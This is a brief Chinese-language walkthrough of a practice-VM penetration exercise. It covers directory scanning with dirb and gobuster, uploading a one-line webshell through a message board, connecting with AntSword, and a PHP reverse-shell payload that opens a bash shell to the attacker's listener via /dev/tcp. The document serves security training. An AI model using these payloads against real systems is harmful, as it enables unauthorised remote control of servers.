1.下載靶機,打開靶機和kali虛擬機
2.查詢kali和靶機ip
3.瀏覽器訪問
訪問81端口有登陸界面
4.掃描敏感目錄
kali? dirb 掃描
一一訪問
robot.txt提示我們繼續找找,可能是因為我們的字典太小了,我們換個掃描器換個字典試下,利用kali自帶的最大的一個字典。
gobuster dir -u http://192.168.126.175 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
5.一一訪問,發現留言板功能
6.漏洞挖掘
在其中進行上傳抓包查看
發現上傳到了graffiti.txt內,嘗試上傳一句話木馬
7.獲取webshell
蟻劍連接
8.上傳反彈shell的php文件
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.130/6666 0>&1'");?>
瀏覽器訪問shell.php
kali? nc監聽